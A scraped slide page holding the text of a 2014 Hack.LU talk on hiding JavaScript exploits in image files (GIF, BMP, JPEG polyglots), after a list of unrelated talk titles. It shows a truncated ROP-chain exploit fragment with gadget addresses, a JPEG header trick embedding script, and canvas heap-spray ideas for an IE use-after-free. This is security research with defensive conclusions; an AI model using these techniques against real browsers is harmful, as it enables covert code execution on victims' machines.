Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
 
First Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User EndpointsFirst Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User Endpoints
 
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024
 
Using IESVE for Room Loads Analysis - Australia & New Zealand
Using IESVE for Room Loads Analysis - Australia & New ZealandUsing IESVE for Room Loads Analysis - Australia & New Zealand
Using IESVE for Room Loads Analysis - Australia & New Zealand
 
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
 
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
 
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteAI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
 
Corporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMSCorporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMS
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
 
Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"
 
Graphic Design Crash Course for beginners
Graphic Design Crash Course for beginnersGraphic Design Crash Course for beginners
Graphic Design Crash Course for beginners
 
Vitthal Shirke Microservices Resume Montevideo
Vitthal Shirke Microservices Resume MontevideoVitthal Shirke Microservices Resume Montevideo
Vitthal Shirke Microservices Resume Montevideo
 
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdfEnhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
 
A Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of PassageA Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of Passage
 
Cracking the code review at SpringIO 2024
Cracking the code review at SpringIO 2024Cracking the code review at SpringIO 2024
Cracking the code review at SpringIO 2024
 
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology SolutionsProsigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology Solutions
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
 
Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024
 
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data AnalysisProviding Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
 

Hacking with Pictures - Hack.LU 2014

  • 1. Hacking with Pictures net-square Saumil Shah Hack.LU 2014
  • 2. Saumil Shah CEO, Net-Square net-square Introduction @therealsaumil saumilshah hacker, trainer, speaker, author - educating, entertaining and exasperating audiences since 1999
  • 3. net-square #who am i CEO Net-Square Reverse Engineering Exploit Writing Penetration Testing Offensive Security Attack Defense Conference Speaker Conference Trainer Web 2.0 HTML5 XSS CSRF SQLi CORS XST clickjacking AJAX FLASH RIA SOAP Web Services UXSS XPATHi .... ... <insert buzzwordy appsec jargon here>
  • 4. net-square Avoiding Radar JS Obfuscation Broken File Formats OLE Embedding Javascript/ Actionscript Spreading the payload
  • 5. net-square Hiding In Plain Sight
  • 6. G r e e t i n g s P r o f e s s o r F a l k e n net-square
  • 7. net-square I'm an evil Javascript I'm an innocent image
  • 8. net-square function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(une scape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax _esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744; addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ec x_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be 0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_ eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000 ;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_ 24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addr essof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval=""! <CANVAS>
  • 9. net-square Avoid the EVIL eval() var a = eval(str); a = (new Function(str))(); Hat tip: Dr. Mario Heiderich @0x6D6172696F
  • 10. Theory Becomes Practice - 2014 net-square Hiding In Plain Sight
  • 11. IMAJS net-square I IZ JAVASCRIPT!
  • 12. Cross Container Scripting - XCS net-square <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script>
  • 13. net-square IMAJS – The Concept • "Polyglot files" – term coined by Ange Albertini @corkami • IMAJS is targeted towards browsers. • It is a perfectly valid image... • ...and a perfectly valid Javascript!
  • 14. IMAJS-GIF Browser Support Height Width Browser/Viewer Image net-square Renders? Javascript Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera ? ? 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes -
  • 15. IMAJS-BMP Browser Support Height Width Browser/Viewer Image net-square Renders? Javascript Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes -
  • 16. net-square All new IMAJS-JPG! • JPG is more powerful than other formats for hiding stuff. • Thanks to EXIF data! • JPG+JS • JPG+HTML • ...and JPG+JS+HTML! Hat tip: Michael Zalewski @lcamtuf
  • 17. Start marker length Start marker length net-square The Secret Sauce Regular JPEG Header FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 FF E2 ... "J F I F 0" next section... Modified JPEG Header FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... next section... "J F I F 0" whole lot of extra space!
  • 18. FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... Start marker comment! net-square The Secret Sauce Modified JPEG Header See the difference? FF D8 FF E0 /* 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 */='';alert(Date());/*...41 41 41 FF E2 ... Javascript goes here next section... Start marker length next section... "J F I F 0" whole lot of extra space!
  • 20. CANVASHTML5 for Exploit Dev • jscript9.dll introduced many changes. – No %u0000 in strings. – No 0x00000000 in strings. • Kills conventional Heap Sprays. • <CANVAS> to the rescue! • IE9 and above "support" HTML5. • <!DOCTYPE html> net-square
  • 21. net-square CANVAS for Exploit Dev • Heap Sprays through Pixel Arrays! • No character restrictions. – All pixels treated equally! • And a bonus... ALPHA CHANNELS.
  • 23. MS14-035 CInput Use-After-Free IMAJS stego PWN! net-square
  • 24. < PAYLOADS GO net-square back in time
  • 25. I'M IN UR BASE GET /lolcat.png 200 OK net-square Attack Timeline JS Exploit code encoded in PNG. EVIL ....KILLING UR DOODZ GET /decoder.jpg 200 OK GET /lolcat.png 304 Not Modified Decoder script references PNG from cache. SAFE MAY 2014 OCT 2014
  • 26. net-square Conclusions - Offensive • Lot of possibilities! • Weird containers, weird encoding, weird obfuscation. • Image attacks emerging "in the wild". • Not limited to just browsers.
  • 27. net-square Conclusions - Defensive • DFIR nightmare. – how far back does your window of inspection go? • Can't rely on extensions, file headers, MIME types or magic numbers. • Wake up call to browser-wallahs.
  • 28. net-square Greets and props • Michael Zalewski @lcamtuf • Ange Albertini @corkami • @zer0mem • Mario Heiderich @0x6D6172696F • The fantastic crew of HACK.LU!
  • 29. net-square Saumil Shah saumil@net-square.com @therealsaumil saumilshah